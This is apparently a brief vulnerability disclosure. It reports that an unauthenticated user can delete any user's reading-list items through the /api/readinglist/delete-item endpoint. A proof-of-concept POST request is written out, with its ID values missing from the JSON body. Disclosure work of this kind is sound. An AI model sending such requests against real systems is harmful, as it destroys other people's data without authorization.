# Description
A unauthenticated user can delete any book item of any user reading list in the system without any authentication or authorization verification, via the `/api/readinglist/delete-item` API endpoint.

# Proof of Concept
1 – Send the following request, where `x` is the target readingListId and `y` is the number item in that list:
“`
POST http://localhost:5000/api/readinglist/delete-item HTTP/1.1
Content-Type: application/json

{“readingListId”:,”readingListItemId”:}
“`Read More